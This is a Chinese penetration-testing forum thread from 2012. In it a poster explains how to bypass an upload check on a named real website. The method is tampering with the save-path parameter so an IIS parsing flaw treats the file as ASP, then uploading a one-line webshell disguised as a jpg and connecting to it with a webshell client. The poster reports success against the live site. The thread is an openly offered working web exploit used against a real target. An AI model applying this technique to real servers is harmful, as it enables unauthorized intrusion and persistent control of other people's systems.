微博
注册
登录
用户名
Email
自动登录
找回密码
密码
登录
立即注册
好友
帖子
收藏
设置
退出
搜索
本版
文章
帖子
用户
门户
Portal
论坛
BBS
xss
乌云漏洞库搜索查询
乌云漏洞原版查询
乌云知识库查询
神算命网免费
星空音乐
中国网络渗透测试联盟
»
论坛
›
--==渗透测试区{ Penetration testing area }==--
›
web app渗透测试::『Web App penetration testing』
›
原创 修改元素突破本地上传验证
欢迎中测联盟老会员回家,1997年注册的域名
返回列表
查看:
3448
|
回复:
1
原创 修改元素突破本地上传验证
[复制链接]
admin
admin
当前离线
积分
8773
电梯直达
楼主
发表于 2012-9-5 14:22:35
|
只看该作者
|
倒序浏览
|
阅读模式
首先感谢z-hero的技术指导,
http://www.political-security.com[url=http://
www.political-security.com
/]/
[/url],先注册个账号,在建立馆那里有个上传,上传地址是
http://www.political-security.co ... wPath=upload/2012-9
,我们来修改一下修改为http:是//www.political-security.com/user/zl_up.asp?fromForm=myform&fromEdit=user1photo&saveTo=../upload/2012-9/1.asp/&showPath=upload/2012-9/1.asp,
% A3 q/ H: y8 N
大家看效果,点上传,上传格式为jpg的一句话,因为我试了,大马不通过,,然后确定点否,查看源代码,
script
>
window.opener.document.myform.user1photo.value=
'upload/2012-9/1.asp/2012090514191858534.jpg'
;
</
script
>
<
script
>
window.alert(
'文件上传成功!'
);window.close();
</
script
>
( h6 ^% _$ i6 _- A
菜刀链接,成功,嘿嘿
amp
,
asp
,
元素
,
账号
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有帐号?
立即注册
x
收藏
0
支持
0
反对
0
相关帖子
•
一条命令添加linux root权限账号密码命令
•
Linux 下利用openssl添加账号密码无回显命令
•
cmd5会员账号
•
linux如何切换账号登陆
•
红帽Linux设置默认登陆账号为root账号
•
百度会员账号
回复
使用道具
举报
netlost
netlost
当前离线
积分
70
沙发
发表于 2012-9-16 14:44:03
|
只看该作者
跟另外一篇文章有相似之处,但是手法不一样,有的上传点限制条件也不一样,看情况而定的。
回复
支持
反对
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表